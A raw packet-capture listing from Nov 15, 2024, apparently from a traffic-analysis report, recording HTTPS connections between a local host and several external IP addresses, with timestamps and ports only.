                                                                                      Nov 15, 2024 18:09:10.027534008 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.151099920 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.151169062 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.151227951 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.151299000 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.151372910 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.151372910 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.277154922 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.277189016 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.277282953 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.277307987 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.277365923 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.308429003 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.308459044 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.308557034 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.308631897 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.308707952 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.409862995 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.409888983 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.410001993 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.410027981 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.410078049 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.523574114 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.523602962 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.523716927 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.523741007 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.523775101 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.523801088 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.555896044 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.555927038 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.556031942 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.556058884 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.556162119 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.658379078 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.658402920 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.658524036 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.658576965 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.658646107 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.721164942 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.721194029 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.721307993 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.721338034 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.721389055 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.773051023 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.773154974 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.773171902 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.773202896 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.787523031 CET62650443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.787554026 CET44362650147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.889775991 CET62651443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.889823914 CET44362651147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.889904976 CET62651443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.890158892 CET62651443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:10.890173912 CET44362651147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.912506104 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:10.912539959 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.912642956 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:10.912893057 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:10.912908077 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.921324015 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:10.921335936 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:10.921391010 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:10.921657085 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:10.921669006 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.528690100 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.529028893 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:11.529067039 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.529524088 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.529830933 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:11.529910088 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.529972076 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:11.544179916 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.544379950 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:11.544423103 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.545871973 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.545937061 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:11.547090054 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:11.547177076 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.547288895 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:11.547302961 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.571358919 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.578854084 CET44362651147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.579113007 CET62651443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:11.579143047 CET44362651147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.580596924 CET44362651147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.580667973 CET62651443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:11.581001997 CET62651443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:11.581079960 CET44362651147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.581111908 CET62651443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:11.589745998 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:11.621767998 CET62651443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:11.621778011 CET44362651147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.669713974 CET62651443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:11.672848940 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.672895908 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.672950029 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:11.672979116 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.673044920 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.673046112 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:11.673058033 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.673086882 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:11.673392057 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.673440933 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:11.673451900 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.674563885 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.717755079 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:11.717796087 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.717839003 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:11.752686977 CET44362651147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.752784967 CET44362651147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.752856016 CET62651443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:11.753546953 CET62651443192.168.2.16147.79.74.176
                                                                                      Nov 15, 2024 18:09:11.753573895 CET44362651147.79.74.176192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.765748024 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:11.765891075 CET4968080192.168.2.16192.229.211.108
                                                                                      Nov 15, 2024 18:09:11.790504932 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.790608883 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.790678978 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:11.790689945 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.790704012 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.790757895 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:11.790792942 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.791174889 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.791217089 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.791225910 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:11.791243076 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.791305065 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:11.793467999 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.793503046 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.793519974 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.793555975 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:11.793571949 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.793591976 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.793597937 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:11.793623924 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.793628931 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:11.793653011 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:11.793699980 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:11.833662987 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.874526024 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:11.874562979 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.908694983 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.908745050 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.908750057 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:11.908782005 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.908824921 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:11.909043074 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.909113884 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.909157038 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:11.909158945 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.909171104 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.909204960 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:11.909224033 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.912597895 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.912653923 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.912702084 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:11.912719011 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.912743092 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:11.912761927 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:11.951396942 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.951442003 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.951483965 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.951487064 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:11.951518059 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:11.951539040 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:12.003729105 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:12.026590109 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.026680946 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.026722908 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.026726961 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:12.026746035 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.026787996 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:12.026789904 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.026802063 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.026833057 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:12.026864052 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.026946068 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.026987076 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:12.027225971 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:12.027247906 CET44362652104.17.24.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.027259111 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:12.027290106 CET62652443192.168.2.16104.17.24.14
                                                                                      Nov 15, 2024 18:09:12.030252934 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:12.030287981 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.030355930 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:12.030675888 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:12.030689001 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.032040119 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.032069921 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.032120943 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:12.032150984 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.032171011 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:12.032196045 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:12.151129007 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.151194096 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.151396036 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:12.151396990 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:12.151453018 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.151513100 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:12.275484085 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.275511980 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.275624037 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:12.275670052 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.275744915 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:12.311470985 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.311592102 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:12.311613083 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.311672926 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.311739922 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:12.311825037 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:12.311863899 CET44362653151.101.194.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.311886072 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:12.311922073 CET62653443192.168.2.16151.101.194.137
                                                                                      Nov 15, 2024 18:09:12.323717117 CET62655443192.168.2.16151.101.130.137
                                                                                      Nov 15, 2024 18:09:12.323812962 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.324059963 CET62655443192.168.2.16151.101.130.137
                                                                                      Nov 15, 2024 18:09:12.324199915 CET62655443192.168.2.16151.101.130.137
                                                                                      Nov 15, 2024 18:09:12.324234009 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.341003895 CET62656443192.168.2.16104.26.12.205
                                                                                      Nov 15, 2024 18:09:12.341084957 CET44362656104.26.12.205192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.341185093 CET62656443192.168.2.16104.26.12.205
                                                                                      Nov 15, 2024 18:09:12.341406107 CET62656443192.168.2.16104.26.12.205
                                                                                      Nov 15, 2024 18:09:12.341439962 CET44362656104.26.12.205192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.653142929 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.653461933 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:12.653481007 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.653944016 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.654241085 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:12.654330969 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.654366970 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:12.695341110 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:12.707788944 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:13.084583998 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.084636927 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.084714890 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.084744930 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:13.084758043 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.084779024 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.084793091 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.084803104 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:13.084831953 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:13.084844112 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.084882975 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:13.084888935 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.088790894 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.089034081 CET62655443192.168.2.16151.101.130.137
                                                                                      Nov 15, 2024 18:09:13.089080095 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.089270115 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.089322090 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.089339018 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:13.089346886 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.089397907 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.089401007 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:13.089411020 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.089467049 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:13.089767933 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.089842081 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.089879990 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:13.089881897 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.089893103 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.089925051 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:13.089931965 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.090708971 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.090749979 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.090753078 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:13.090760946 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.090795994 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:13.090802908 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.090821028 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.090895891 CET62655443192.168.2.16151.101.130.137
                                                                                      Nov 15, 2024 18:09:13.091329098 CET62655443192.168.2.16151.101.130.137
                                                                                      Nov 15, 2024 18:09:13.091432095 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.091603041 CET62655443192.168.2.16151.101.130.137
                                                                                      Nov 15, 2024 18:09:13.091623068 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.091720104 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.091763973 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.091787100 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:13.091792107 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.091830969 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:13.091835022 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.091845036 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.091877937 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:13.092824936 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.095202923 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.095263958 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:13.095271111 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.100236893 CET44362656104.26.12.205192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.100485086 CET62656443192.168.2.16104.26.12.205
                                                                                      Nov 15, 2024 18:09:13.100512981 CET44362656104.26.12.205192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.102127075 CET44362656104.26.12.205192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.102195978 CET62656443192.168.2.16104.26.12.205
                                                                                      Nov 15, 2024 18:09:13.103152037 CET62656443192.168.2.16104.26.12.205
                                                                                      Nov 15, 2024 18:09:13.103235960 CET44362656104.26.12.205192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.103446007 CET62656443192.168.2.16104.26.12.205
                                                                                      Nov 15, 2024 18:09:13.103454113 CET44362656104.26.12.205192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.139830112 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:13.139836073 CET62655443192.168.2.16151.101.130.137
                                                                                      Nov 15, 2024 18:09:13.139847994 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.155739069 CET62656443192.168.2.16104.26.12.205
                                                                                      Nov 15, 2024 18:09:13.168957949 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.168998003 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.169058084 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:13.169068098 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.169116020 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:13.169140100 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.169202089 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.169245958 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:13.169250965 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.169341087 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.169389963 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:13.169436932 CET62654443192.168.2.16104.17.25.14
                                                                                      Nov 15, 2024 18:09:13.169452906 CET44362654104.17.25.14192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.220000029 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.269490957 CET62655443192.168.2.16151.101.130.137
                                                                                      Nov 15, 2024 18:09:13.287111044 CET44362656104.26.12.205192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.287396908 CET44362656104.26.12.205192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.287492990 CET62656443192.168.2.16104.26.12.205
                                                                                      Nov 15, 2024 18:09:13.311791897 CET62656443192.168.2.16104.26.12.205
                                                                                      Nov 15, 2024 18:09:13.311836004 CET44362656104.26.12.205192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.339025021 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.339046955 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.339081049 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.339097023 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.339123011 CET44362655151.101.130.137192.168.2.16
                                                                                      Nov 15, 2024 18:09:13.339250088 CET62655443192.168.2.16151.101.130.137
                                                                                      Nov 15, 2024 18:09:13.339250088 CET62655443192.168.2.16151.101.130.137
